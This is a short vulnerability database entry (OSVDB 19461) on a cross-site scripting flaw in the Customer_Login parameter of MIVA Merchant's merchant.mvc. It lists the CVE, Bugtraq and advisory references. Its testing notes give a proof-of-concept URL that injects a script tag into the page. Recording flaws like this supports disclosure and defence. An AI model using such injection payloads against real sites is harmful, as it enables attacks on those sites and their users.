MIVA Merchant merchant.mvc Customer_Login Variable XSS

2005-09-13T05:52:48
ID OSVDB:19461
Type osvdb
Reporter OSVDB
Modified 2005-09-13T05:52:48

Description

Manual Testing Notes

http://[target]/mm5/ merchant.mvc?Screen=ACNT&Action=EMPW&Customer_Login="><script>document.write("\n<br><input%20type=text%20name=somenewfield%20value='Hello%20World'>")</script>

References:

Security Tracker: 1014917 Secunia Advisory ID:16829 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-09/0177.html CVE-2005-2953 Bugtraq ID: 14828